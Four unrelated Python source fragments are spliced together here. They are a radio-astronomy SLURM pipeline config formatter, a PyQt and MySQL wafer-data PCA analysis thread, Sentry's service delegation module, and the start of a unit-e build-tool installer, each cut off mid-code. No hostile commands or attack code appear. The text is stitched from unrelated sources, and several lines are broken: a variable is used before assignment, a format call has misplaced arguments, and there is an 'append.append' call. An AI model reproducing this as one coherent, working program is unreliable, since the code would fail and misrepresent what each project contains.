popped : bool
Was the script popped?"""
popped = False
if script in kwargs['scripts']:
index = kwargs['scripts'].index(script)
kwargs['scripts'].pop(index)
kwargs['threadsafe'].pop(index)
kwargs['containers'].pop(index)
popped = True
return popped
def format_args(config,submit,quiet,dependencies,justrun):
"""Format (and validate) arguments from config file, to be passed into write_jobs() function.
Arguments:
----------
config : str
Path to config file.
submit : bool
Allow user to force submitting to queue immediately.
quiet : bool
Activate quiet mode, with suppressed output?
dependencies : str
Comma-separated list of SLURM job dependencies.
justrun : bool
Just run the pipeline without rebuilding each job script (if it exists).
Returns:
--------
kwargs : dict
Keyword arguments extracted from [slurm] section of config file, to be passed into write_jobs() function."""
#Ensure all keys exist in these sections
kwargs = get_config_kwargs(config,'slurm',SLURM_CONFIG_KEYS)
data_kwargs = get_config_kwargs(config,'data',['vis'])
get_config_kwargs(config, 'fields', FIELDS_CONFIG_KEYS)
crosscal_kwargs = get_config_kwargs(config, 'crosscal', CROSSCAL_CONFIG_KEYS)
#Check selfcal params
if config_parser.has_section(config,'selfcal'):
selfcal_kwargs = get_config_kwargs(config, 'selfcal', SELFCAL_CONFIG_KEYS)
params = bookkeeping.get_selfcal_params()
if selfcal_kwargs['loop'] > 0:
logger.warning("Starting with loop={0}, which is only valid if previous loops were successfully run in this directory.".format(selfcal_kwargs['loop']))
#Find RACS outliers
elif ((nspw > 1 and 'selfcal_part1.py' in [i[0] for i in kwargs['postcal_scripts']]) or (nspw == 1 and 'selfcal_part1.py' in [i[0] for i in kwargs['scripts']])) and selfcal_kwargs['outlier_threshold'] != 0 and selfcal_kwargs['outlier_threshold'] != '':
logger.info('Populating sky model for selfcal using outlier_threshold={0}'.format(selfcal_kwargs['outlier_threshold']))
logger.info('Querying Rapid ASAKP Continuum Survey (RACS) catalog within 2 degrees of target phase centre. Please allow a moment for this.')
sky_model_kwargs = deepcopy(kwargs)
sky_model_kwargs['partition'] = 'Devel'
mpi_wrapper = srun(sky_model_kwargs, qos=True, time=2, mem=0)
command = write_command('set_sky_model.py', '-C {0}'.format(config), mpi_wrapper=mpi_wrapper, container=kwargs['container'],logfile=False)
logger.debug('Running following command:\n\t{0}'.format(command))
os.system(command)
if config_parser.has_section(config,'image'):
imaging_kwargs = get_config_kwargs(config, 'image', IMAGING_CONFIG_KEYS)
if config_parser.has_section(config,'image'):
imaging_kwargs = get_config_kwargs(config, 'image', IMAGING_CONFIG_KEYS)
#Force submit=True if user has requested it during [-R --run]
if submit:
kwargs['submit'] = True
#Ensure nspw is integer
if type(crosscal_kwargs['nspw']) is not int:
logger.warning("Argument 'nspw'={0} in '{1}' is not an integer. Will set to integer ({2}).".format(crosscal_kwargs['nspw']),config,int(crosscal_kwargs['nspw']))
crosscal_kwargs['nspw'] = int(crosscal_kwargs['nspw'])
spw = crosscal_kwargs['spw']
nspw = crosscal_kwargs['nspw']
mem = int(kwargs['mem'])
if nspw > 1 and len(kwargs['scripts']) == 0:
logger.warning('Setting nspw=1, since no "scripts" parameter in "{0}" is empty, so there\'s nothing run inside SPW directories.'.format(config))
config_parser.overwrite_config(config, conf_dict={'nspw' : 1}, conf_sec='crosscal')
nspw = 1
#If nspw = 1 and precal or postcal scripts present, overwrite config and reload
if nspw == 1:
if len(kwargs['precal_scripts']) > 0 or len(kwargs['postcal_scripts']) > 0:
logger.warning('Appending "precal_scripts" to beginning of "scripts", and "postcal_scripts" to end of "scripts", since nspw=1. Overwritting this in "{0}".'.format(config))
#Drop first instance of calc_refant.py from precal scripts in preference for one in scripts (after flag_round_1.py)
if 'calc_refant.py' in [i[0] for i in kwargs['precal_scripts']] and 'calc_refant.py' in [i[0] for i in kwargs['scripts']]:
kwargs['precal_scripts'].pop([i[0] for i in kwargs['precal_scripts']].index('calc_refant.py'))
scripts = kwargs['precal_scripts'] + kwargs['scripts'] + kwargs['postcal_scripts']
config_parser.overwrite_config(config, conf_dict={'scripts' : scripts}, conf_sec='slurm')
config_parser.overwrite_config(config, conf_dict={'precal_scripts' : []}, conf_sec='slurm')
config_parser.overwrite_config(config, conf_dict={'postcal_scripts' : []}, conf_sec='slurm')
kwargs = get_config_kwargs(config,'slurm',SLURM_CONFIG_KEYS)
else:
scripts = kwargs['scripts']
else:
scripts = kwargs['precal_scripts'] + kwargs['postcal_scripts']
kwargs['num_precal_scripts'] = len(kwargs['precal_scripts'])
# Validate kwargs along with MS
kwargs['MS'] = data_kwargs['vis']
validate_args(kwargs,config)
#Reformat scripts tuple/list, to extract scripts, threadsafe, and containers as parallel lists
#Check that path to each script and container exists or is ''
kwargs['scripts'] = [check_path(i[0]) for i in scripts]
kwargs['threadsafe'] = [i[1] for i in scripts]
kwargs['containers'] = [check_path(i[2]) for i in scripts]
if not crosscal_kwargs['createmms']:
logger.info("You've set 'createmms = False' in '{0}', so forcing 'keepmms = False'. Will use single CPU for every job other than 'partition.py', 'quick_tclean.py' and 'selfcal_*.py', if present.".format(config))
config_parser.overwrite_config(config, conf_dict={'keepmms' : False}, conf_sec='crosscal')
kwargs['threadsafe'] = [False]*len(scripts)
elif not crosscal_kwargs['keepmms']:
#Set threadsafe=False for split and postcal scripts (since working with MS not MMS).
if 'split.py' in kwargs['scripts']:
kwargs['threadsafe'][kwargs['scripts'].index('split.py')] = False
if nspw != 1:
kwargs['threadsafe'][kwargs['num_precal_scripts']:] = [False]*len(kwargs['postcal_scripts'])
#Set threadsafe=True for quick-tclean, selfcal_part1 or science_image as tclean uses MPI even for an MS (TODO: ensure it doesn't crash for flagging step)
for threadsafe_script in ['quick_tclean.py','selfcal_part1.py','science_image.py']:
if threadsafe_script in kwargs['scripts']:
kwargs['threadsafe'][kwargs['scripts'].index(threadsafe_script)] = True
#Only reduce the memory footprint if we're not using all CPUs on each node
if kwargs['ntasks_per_node'] < NTASKS_PER_NODE_LIMIT and nspw > 1:
mem = int(mem // (nspw/2))
dopol = config_parser.get_key(config, 'run', 'dopol')
if not dopol and ('xy_yx_solve.py' in kwargs['scripts'] or 'xy_yx_apply.py' in kwargs['scripts']):
logger.warning("Cross-hand calibration scripts 'xy_yx_*' found in scripts. Forcing dopol=True in '[run]' section of '{0}'.".format(config))
config_parser.overwrite_config(config, conf_dict={'dopol' : True}, conf_sec='run', sec_comment='# Internal variables for pipeline execution')
includes_partition = any('partition' in script for script in kwargs['scripts'])
#If single correctly formatted spw, split into nspw directories, and process each spw independently
if nspw > 1:
#Write | |
on data/information recieved
# function(self, Data):
# GetData = Data
system_log = pyqtSignal(str)
progress = pyqtSignal(str)
query_result = pyqtSignal(object)
query_result2 = pyqtSignal(object)
def __init__(self, query_cat, query_input1, query_input2, parent = None):
super(QueryThread, self).__init__(parent)
self.query_cat = query_cat
self.query_input1 = query_input1
self.query_input2 = query_input2
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.quit()
def run(self):
with MySQL_Query(self.query_input1, self.query_input2 , self.system_log, self.progress) as mysqlquery:
if self.query_cat == 'None' and self.query_input1 == 'None':
query_tech = mysqlquery.query_tech()
self.query_result.emit(query_tech)
elif self.query_cat == 'Process_Tech_Category':
query_process_tech_category = mysqlquery.query_process_tech_category()
self.query_result.emit(query_process_tech_category)
elif self.query_cat == 'Product':
query_product = mysqlquery.query_product()
self.query_result.emit(query_product)
elif self.query_cat == 'Test':
query_test = mysqlquery.query_test()
self.query_result.emit(query_test)
elif self.query_cat == 'Lot':
query_lot = mysqlquery.query_lot()
self.query_result.emit(query_lot)
elif self.query_cat == 'Bin':
query_bin = mysqlquery.query_bin()
self.query_result.emit(query_bin)
elif self.query_cat == 'Lot Bin':
query_lot = mysqlquery.query_lot()
self.query_result.emit(query_lot)
query_bin = mysqlquery.query_bin()
self.query_result2.emit(query_bin)
elif self.query_cat == 'Filter Bin':
query_filterbin = mysqlquery.query_filterbin()
self.query_result.emit(query_filterbin)
elif self.query_cat == 'Time':
query_lot_time = mysqlquery.query_lot_time()
self.query_result.emit(query_lot_time)
elif self.query_cat == 'Step':
query_step = mysqlquery.query_step()
self.query_result.emit(query_step)
elif self.query_cat == 'Filter Inline Step':
query_step = mysqlquery.query_filterinlinestep()
self.query_result.emit(query_step)
elif self.query_cat == 'Filter Inline Step Name':
query_step_name = mysqlquery.query_filterinlinestepname()
self.query_result.emit(query_step_name)
elif self.query_cat == 'Filter Wip Step':
query_step = mysqlquery.query_filterwipstep()
self.query_result.emit(query_step)
elif self.query_cat == 'Filter Wip Step Name':
query_step_name = mysqlquery.query_filterwipstepname()
self.query_result.emit(query_step_name)
elif self.query_cat == 'Tool':
query_tool = mysqlquery.query_tool()
self.query_result.emit(query_tool)
elif self.query_cat == 'ET':
query_et = mysqlquery.query_ET()
self.query_result2.emit(query_et)
elif self.query_cat == 'Filter ET':
query_et = mysqlquery.query_filterET()
self.query_result2.emit(query_et)
elif self.query_cat == 'Query':
query_data = mysqlquery.query_data()
self.query_result.emit(query_data)
else:
self.system_log.emit("Error! Unable to retrieve data from MySQL Database")
class Thread(QThread):
# MultiThreading class for PCA
# Contain various function:
# 1) Querying ET data for analysis
# 2) Data Preparation (Uncompressing ET data into dataframe/array)
# 2) Data Cleaning (Removing Outliers)
# 3) PCA
# 4) Emit data for data visualisation and Exporting (Excel)
progress = pyqtSignal(float)
system_log = pyqtSignal(str)
data = pyqtSignal(object)
eigenpairs = pyqtSignal(object)
principal_components = pyqtSignal(object)
PC_barplot = pyqtSignal(object)
screeplot = pyqtSignal(object)
biplot = pyqtSignal(object)
completed = pyqtSignal(str)
def __init__(self, Input, parent = None):
super(Thread, self).__init__(parent)
self.oldstdout = sys.stdout
self.oldstderr = sys.stderr
self.DataSource = Input[0]
self.Product_No = Input[1]
self.Lot_No = Input[2]
self.Test_Type = Input[3]
self.Bin = Input[4]
self.Class = Input[5]
self.Class_Type = Input[6]
self.StepTool = Input[7]
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.quit()
def run(self):
start = time.time()
if self.DataSource[0] == 'Import':
merged_data = []
merged_data_key = []
Scribe = []
ImportedSheets = self.DataSource[1][0]
ImportedSheets_name = self.DataSource[1][1]
ImportData_headers_selected = self.DataSource[1][2]
self.system_log.emit('Organizing data..')
for i in range(len(ImportedSheets_name)):
if len(ImportData_headers_selected[ImportedSheets_name[i]]) >= 1:
Data = ImportedSheets[ImportedSheets_name[i]][ImportData_headers_selected[ImportedSheets_name[i]]]
ImportData_Header_list = []
ImportData_Header_Change_list = []
ImportData_Merge_key = []
for j in range(len(ImportData_headers_selected[ImportedSheets_name[i]])):
if 'LOT' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Lot_No')
ImportData_Merge_key.append('Lot_No')
elif 'Lot' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Lot_No')
ImportData_Merge_key.append('Lot_No')
else:
pass
if 'Wafer_Alias' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Wafer_Alias')
ImportData_Merge_key.append('Wafer_Alias')
elif 'WAFER' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
if 'LOT' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
for n in range(len(Data)):
if len(Data['WAFER'][n]) == 1:
Data['Wafer_Alias'] = Data['LOT'][n].split('.')[0] + '.' + '0' + Data['WAFER'][n]
else:
Data['Wafer_Alias'] = Data['LOT'][n].split('.')[0] + Data['WAFER'][n]
ImportData_Merge_key.append.append('Wafer_Alias')
elif 'Lot_No' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
for n in range(len(Data)):
if len(Data['WAFER'][n]) == 1:
Data['Wafer_Alias'] = Data['Lot_No'][n].split('.')[0] + '.' + '0' + Data['WAFER'][n]
else:
Data['Wafer_Alias'] = Data['Lot_No'][n].split('.')[0] + Data['WAFER'][n]
ImportData_Merge_key.append.append('Wafer_Alias')
else:
pass
Data.drop(['WAFER'], axis=1, inplace = True)
else:
pass
if 'SCRIBE' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Scribe')
ImportData_Merge_key.append('Scribe')
for n in range(len(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique())):
Scribe.append(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique()[n])
self.progress.emit(np.round((n/len(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique()))*100, decimals = 2))
elif 'SUBSTRATE' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Scribe')
ImportData_Merge_key.append('Scribe')
for n in range(len(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique())):
Scribe.append(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique()[n])
self.progress.emit(np.round((n/len(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique()))*100, decimals = 2))
else:
self.system_log.emit("Error! Please select Data Column consist of Wafer Scribe")
return
if 'PRODUCT' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Product')
ImportData_Merge_key.append('Product')
if 'TIME' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Measure')
if 'Yield' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Yield')
if self.Class_Type == 'Yield':
wafer_classification = []
for n in range(len(Data)):
if Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] < self.Class[0]:
wafer_classification.append('Bad')
elif Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] >= self.Class[0] and Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] <= self.Class[1]:
wafer_classification.append('Mild')
else:
wafer_classification.append('Good')
Data['Classification'] = wafer_classification
elif 'YIELD' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Yield')
if self.Class_Type == 'Yield':
wafer_classification = []
for n in range(len(Data)):
if Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] < self.Class[0]:
wafer_classification.append('Bad')
elif Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] >= self.Class[0] and Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] <= self.Class[1]:
wafer_classification.append('Mild')
else:
wafer_classification.append('Good')
Data['Classification'] = wafer_classification
elif 'sort' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Yield')
if self.Class_Type == 'Yield':
wafer_classification = []
for n in range(len(Data)):
if Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] < self.Class[0]:
wafer_classification.append('Bad')
elif Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] >= self.Class[0] and Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] <= self.Class[1]:
wafer_classification.append('Mild')
else:
wafer_classification.append('Good')
Data['Classification'] = wafer_classification
else:
self.system_log.emit("Error! Please select Data Column consist of Wafer Yield")
return
Data.rename(columns={ImportData_Header_list[n]:ImportData_Header_Change_list[n] for n in range(len(ImportData_Header_list))}, inplace=True)
merged_data_key.append(ImportData_Merge_key)
merged_data.append(Data)
self.progress.emit(0)
with MySQL_Query(tuple(Scribe), 'None', self.system_log, self.progress) as mysqlquery:
df_et_wmap_raw = mysqlquery.df_et_wmap_raw_import() #dataframe
if len(df_et_wmap_raw[0].index) == 0 or len(df_et_wmap_raw[1]) == 0:
self.system_log.emit("Error! No data found in MySQL database")
return
prepared_data = self.data_preparation(df_et_wmap_raw)
df_combined_data = prepared_data
info_header = []
data_header = []
for n in range(len(merged_data)):
df_combined_data = pd.merge(df_combined_data, merged_data[n], how = 'left', on = merged_data_key[n])
if self.Class_Type == 'Yield':
df_combined_data[['Classification','Yield']].replace('', np.nan, inplace=True)
df_combined_data.dropna(subset=['Classification','Yield'], inplace=True)
df_combined_data.reset_index(drop = True, inplace = True)
else:
self.system_log.emit("Error! Please ensure that the 'Yield' CheckBox is Checked under Classification")
return
df_combined_data.dropna(axis=1, how='all', inplace=True)
for n in range(len(df_combined_data.columns)):
if type(df_combined_data.iloc[0,n]) == str:
info_header.append(df_combined_data.columns[n])
else:
data_header.append(df_combined_data.columns[n])
info_header.append('Measure')
info_header.append('Yield')
data_header.remove('Measure')
data_header.remove('Yield')
cleaned_data = self.data_cleaning([df_combined_data, data_header])
df_combined_data = cleaned_data[1][info_header + data_header]
PCA = self.PCA([cleaned_data[0], cleaned_data[1], info_header, data_header])
elif self.DataSource[0] == 'MySQL':
with MySQL_Query([self.Product_No,
self.Lot_No,
self.Test_Type, self.Bin, self.Class], 'None', self.system_log, self.progress) as mysqlquery:
df_et_wmap_raw = mysqlquery.df_et_wmap_raw() #dataframe
if len(df_et_wmap_raw[0].index) == 0 or len(df_et_wmap_raw[1]) == 0:
self.system_log.emit("Error! No data found in MySQL database")
return
if self.Class_Type == 'Bin':
df_wafer_class = mysqlquery.wafer_bin()
if self.Class_Type == 'Yield':
df_wafer_class = mysqlquery.wafer_yield()
for count in (df_wafer_class['Classification'].value_counts()).tolist():
if count < 2:
self.system_log.emit('Error! The classfication criteria defined could not differentiate the selected data')
return
prepared_data = self.data_preparation(df_et_wmap_raw)
info_header = ['Product','Lot_No','Wafer_Alias','Scribe']
data_header = prepared_data.columns[4:].tolist()
et_cleaned_data = self.data_cleaning([prepared_data, data_header])
df_combined_data = pd.merge(df_wafer_class, et_cleaned_data[1] , how='left', on = info_header)
PCA = self.PCA([et_cleaned_data[0], et_cleaned_data[1], info_header, data_header])
else:
self.system_log.emit('Error! Unable to locate Data Source')
return
self.system_log.emit('Performing Data Visualization..')
if len(PCA[1].columns) >= 10:
NumberOfPC = 11
else:
NumberOfPC = len(PCA[1].columns)
if self.DataSource[0] == 'Import':
df_biplot = PCA[2][info_header]
for l in range(1,NumberOfPC):
projected_data = list(PCA[2][f"PC{l}"])
scale_projected_data = 1.0/(max(projected_data) - min(projected_data))
scaled_projected_data = list(i*scale_projected_data for i in projected_data)
df_biplot[f"PC{l}"] = scaled_projected_data
elif self.DataSource[0] == 'MySQL':
df_biplot = PCA[2][info_header]
for l in range(1,NumberOfPC):
projected_data = list(PCA[2][f"PC{l}"])
scale_projected_data = 1.0/(max(projected_data) - min(projected_data))
scaled_projected_data = list(i*scale_projected_data for i in projected_data)
df_biplot[f"PC{l}"] = scaled_projected_data
if type(self.StepTool) == str:
df_biplot = pd.merge(df_wafer_class, df_biplot, how = "left", on = info_header)
df_biplot.drop_duplicates(subset=['Wafer_Alias','Scribe'], inplace = True)
df_biplot.reset_index(drop = True, inplace = True)
df_biplot[['Classification']].replace('', np.nan, inplace=True)
df_biplot.dropna(subset=['Classification'], inplace=True)
df_biplot.reset_index(drop = True, inplace = True)
else:
self.StepTool['Tool & Chamber'] = self.StepTool['Tool'] + " " + self.StepTool['Chamber']
self.StepTool.drop(['Tool','Chamber'], axis=1, inplace = True)
df_biplot = pd.merge(self.StepTool, pd.merge(df_wafer_class, df_biplot, how = "left", on = info_header), how = "left", on = 'Scribe')
df_biplot.drop_duplicates(subset=['Wafer_Alias','Scribe'], inplace = True)
df_biplot.reset_index(drop = True, inplace = True)
df_biplot[['Classification','Tool & Chamber']].replace('', np.nan, inplace=True)
df_biplot.dropna(subset=['Classification','Tool & Chamber'], inplace=True)
df_biplot.reset_index(drop = True, inplace = True)
self.data.emit([df_combined_data, df_biplot])
self.principal_components.emit(PCA[1].round(3))
self.PC_barplot.emit(PCA[1])
self.screeplot.emit(PCA[0])
self.biplot.emit([PCA[3], df_biplot])
end = time.time()
elapsed = (end - start)/60
self.system_log.emit('Analysis Completed!')
self.system_log.emit(f"Elapsed time: {math.floor(float(format(elapsed)))} min {np.round(((float(format(elapsed)) - math.floor(float(format(elapsed))))*60),decimals = 0)} sec")
def data_preparation(self, df_et_wmap_raw):
df_data = df_et_wmap_raw[0]
param_name = df_et_wmap_raw[1]
wmap_raw_value_index = df_data.columns.get_loc('wmap')
stored_wmap_raw_data = []
stored_data_section = []
expanded_data_column = []
expanded_data_wafer = []
"Finalized data set"
self.system_log.emit("Preparing data...")
# Unpack ET site level data from wmap
for row in range(len(df_data)):
wmap_raw_value_str = df_data.loc[row][wmap_raw_value_index]
wmap_raw_value = wmap_raw_value_str.replace(';', '')
wmap_raw_value = wmap_raw_value.split(',')
wmap_raw_value = list(filter(None, wmap_raw_value))
wmap_raw_value_filtered = []
for element in wmap_raw_value:
element1 = element.split(':')
element1[0] = int(element1[0])
element1[1] = float(element1[1])
element1 = tuple(element1)
wmap_raw_value_filtered.append(element1)
progression = np.round((row/len(df_data))*100, | |
<filename>src/sentry/utils/services.py
from __future__ import absolute_import
import functools
import inspect
import itertools
import logging
import threading
import six
from django.utils.functional import empty, LazyObject
from sentry.utils import warnings
from sentry.utils.concurrent import FutureSet, ThreadedExecutor
from .imports import import_string
logger = logging.getLogger(__name__)
class Service(object):
__all__ = ()
def validate(self):
"""
Validates the settings for this backend (i.e. such as proper connection
info).
Raise ``InvalidConfiguration`` if there is a configuration error.
"""
def setup(self):
"""
Initialize this service.
"""
class LazyServiceWrapper(LazyObject):
"""
Lazyily instantiates a standard Sentry service class.
>>> LazyServiceWrapper(BaseClass, 'path.to.import.Backend', {})
Provides an ``expose`` method for dumping public APIs to a context, such as
module locals:
>>> service = LazyServiceWrapper(...)
>>> service.expose(locals())
"""
def __init__(self, backend_base, backend_path, options, dangerous=()):
super(LazyServiceWrapper, self).__init__()
self.__dict__.update(
{
'_backend': backend_path,
'_options': options,
'_base': backend_base,
'_dangerous': dangerous,
}
)
def __getattr__(self, name):
if self._wrapped is empty:
self._setup()
return getattr(self._wrapped, name)
def _setup(self):
backend = import_string(self._backend)
assert issubclass(backend, Service)
if backend in self._dangerous:
warnings.warn(
warnings.UnsupportedBackend(
u'The {!r} backend for {} is not recommended '
'for production use.'.format(self._backend, self._base)
)
)
instance = backend(**self._options)
self._wrapped = instance
def expose(self, context):
base = self._base
for key in itertools.chain(base.__all__, ('validate', 'setup')):
if inspect.ismethod(getattr(base, key)):
context[key] = (lambda f: lambda *a, **k: getattr(self, f)(*a, **k))(key)
else:
context[key] = getattr(base, key)
def resolve_callable(value):
if callable(value):
return value
elif isinstance(value, six.string_types):
return import_string(value)
else:
raise TypeError('Expected callable or string')
class Context(object):
def __init__(self, request, backends):
self.request = request
self.backends = backends
def copy(self):
return Context(
self.request,
self.backends.copy(),
)
class ServiceDelegator(Service):
"""\
This is backend that coordinates and delegates method execution to multiple
backends. It can be used to route requests to different backends based on
method arguments, as well as execute the same request against multiple
backends in parallel for testing backend performance and data consistency.
The backends are provided as mapping of backend name to configuration
parameters:
'redis': {
'path': 'sentry.tsdb.redis.RedisTSDB',
'executor': {
'path': 'sentry.utils.services.ThreadedExecutor',
'options': {
'worker_count': 1,
},
},
},
'dummy': {
'path': 'sentry.tsdb.dummy.DummyTSDB',
'executor': {
'path': 'sentry.utils.services.ThreadedExecutor',
'options': {
'worker_count': 4,
},
},
},
# ... etc ...
The backends used for a method call are determined by a selector function
which is provided with the current context, the method name (as a string)
and arguments (in the form returned by ``inspect.getcallargs``) and
expected to return a list of strings which correspond to names in the
backend mapping. (This list should contain at least one member.) The first
item in the result list is considered the "primary backend". The remainder
of the items in the result list are considered "secondary backends". The
result value of the primary backend will be the result value of the
delegated method (to callers, this appears as a synchronous method call.)
The secondary backends are called asynchronously in the background. (To
receive the result values of these method calls, provide a callback_func,
described below.) If the primary backend name returned by the selector
function doesn't correspond to any registered backend, the function will
raise a ``InvalidBackend`` exception. If any referenced secondary backends
are not registered names, they will be discarded and logged.
The members and ordering of the selector function result (and thus the
primary and secondary backends for a method call) may vary from call to
call based on the calling arguments or some other state. For example, some
calls may use a different primary backend based on some piece of global
state (e.g. some property of a web request), or a secondary backend
undergoing testing may be included based on the result of a random number
generator (essentially calling it in the background for a sample of calls.)
The selector function and callback function can be provided as either:
- A dotted import path string (``path.to.callable``) that will be
imported at backend instantiation, or
- A reference to a callable object.
Implementation notes:
- Only method access is delegated to the individual backends. Attribute
values are returned from the base backend. Only methods that are defined
on the base backend are eligble for delegation (since these methods are
considered the public API.)
- The backend makes no attempt to synchronize common backend option values
between backends (e.g. TSDB rollup configuration) to ensure equivalency
of request parameters based on configuration.
- Each backend is associated with an executor pool which defaults to a
thread pool implementation unless otherwise specified in the backend
configuration. If the backend itself is not thread safe (due to socket
access, etc.), it's recommended to specify a pool size of 1 to ensure
exclusive access to resources. Each executor is started when the first
task is submitted.
- The request is added to the request queue of the primary backend using a
blocking put. The request is added to the request queue(s) of the
secondary backend(s) as a non-blocking put (if these queues are full, the
request is rejected and the future will raise ``Queue.Full`` when
attempting to retrieve the result.)
- The ``callback_func`` is called after all futures have completed, either
successfully or unsuccessfully. The function parameters are:
- the context,
- the method name (as a string),
- the calling arguments (as returned by ``inspect.getcallargs``),
- the backend names (as returned by the selector function),
- a list of results (as either a ``Future``, or ``None`` if the backend
was invalid) of the same length and ordering as the backend names.
"""
class InvalidBackend(Exception):
"""\
Exception raised when an invalid backend is returned by a selector
function.
"""
class State(threading.local):
def __init__(self):
self.context = None
__state = State()
def __init__(self, backend_base, backends, selector_func, callback_func=None):
self.__backend_base = import_string(backend_base)
def load_executor(options):
path = options.get('path')
if path is None:
executor_cls = ThreadedExecutor
else:
executor_cls = import_string(path)
return executor_cls(**options.get('options', {}))
self.__backends = {}
for name, options in backends.items():
self.__backends[name] = (
import_string(options['path'])(**options.get('options', {})),
load_executor(options.get('executor', {})),
)
self.__selector_func = resolve_callable(selector_func)
if callback_func is not None:
self.__callback_func = resolve_callable(callback_func)
else:
self.__callback_func = None
def validate(self):
for backend, executor in self.__backends.values():
backend.validate()
def setup(self):
for backend, executor in self.__backends.values():
backend.setup()
def __getattr__(self, attribute_name):
# When deciding how to handle attribute accesses, we have three
# different possible outcomes:
# 1. If this is defined as a method on the base implementation, we are
# able delegate it to the backends based on the selector function.
# 2. If this is defined as an attribute on the base implementation, we
# are able to (immediately) return that as the value. (This also
# mirrors the behavior of ``LazyServiceWrapper``, which will cache
# any attribute access during ``expose``, so we can't delegate
# attribute access anyway.)
# 3. If this isn't defined at all on the base implementation, we let
# the ``AttributeError`` raised by ``getattr`` propagate (mirroring
# normal attribute access behavior for a missing/invalid name.)
base_value = getattr(self.__backend_base, attribute_name)
if not inspect.ismethod(base_value):
return base_value
def execute(*args, **kwargs):
context = type(self).__state.context
# If there is no context object already set in the thread local
# state, we are entering the delegator for the first time and need
# to create a new context.
if context is None:
from sentry.app import env # avoids a circular import
context = Context(env.request, {})
# If this thread already has an active backend for this base class,
# we can safely call that backend synchronously without delegating.
if self.__backend_base in context.backends:
backend = context.backends[self.__backend_base]
return getattr(backend, attribute_name)(*args, **kwargs)
# Binding the call arguments to named arguments has two benefits:
# 1. These values always be passed in the same form to the selector
# function and callback, regardless of how they were passed to
# the method itself (as positional arguments, keyword arguments,
# etc.)
# 2. This ensures that the given arguments are those supported by
# the base backend itself, which should be a common subset of
# arguments that are supported by all backends.
callargs = inspect.getcallargs(base_value, None, *args, **kwargs)
selected_backend_names = list(self.__selector_func(context, attribute_name, callargs))
if | |
<reponame>castarco/unit-e<gh_stars>10-100
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Copyright (c) 2019 The Unit-e developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or https://opensource.org/licenses/MIT.
import argparse
import os
import subprocess
import sys
import platform
import tempfile
from pathlib import Path
from contextlib import contextmanager
OSSLSIGNCODE_VER = '1.7.1'
OSSLSIGNCODE_DIR = 'osslsigncode-'+OSSLSIGNCODE_VER
@contextmanager
def cd(destination_dir):
original_dir = os.getcwd()
os.chdir(destination_dir)
try:
yield
finally:
os.chdir(original_dir)
class Installer:
""" Wrapper around native package installer, supports apt-get and brew, only
installs packages which aren't installed yet."""
def __init__(self, backend=None, quiet=False):
if backend != "apt" and backend != "brew":
raise ValueError("Invalid value for backend argument: '%'. Valid values are `apt` and `brew`.")
self.backend = backend
self.updated = False
self.to_install = []
if quiet and self.backend == "apt":
self.flags = ['-qq']
else:
self.flags = []
def backend_command(self, subcommand):
if self.backend == 'apt':
if subcommand == 'ls':
command = ['dpkg', '-s']
else:
command = ['sudo', 'apt-get', subcommand] + self.flags
elif self.backend == 'brew':
command = ['brew', subcommand]
return command
def update(self):
if not self.updated:
self.updated = True
subprocess.check_call(self.backend_command('update'))
def try_to_install(self, *programs):
self.update()
print(self.backend + ': installing', ", ".join(programs))
return subprocess.call(self.backend_command('install') + list(programs)) == 0
def batch_install(self):
if not self.to_install:
print(self.backend + ': nothing to install')
return
if not self.try_to_install(*self.to_install):
print('Could not install packages.', file=sys.stderr)
exit(1)
self.to_install = []
def is_installed(self, program):
return subprocess.call(self.backend_command('ls') + [program], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) == 0
def add_requirements(self, *programs):
for program in programs:
if not self.is_installed(program):
self.to_install.append(program)
def verify_user_specified_osslsigncode(user_spec_path):
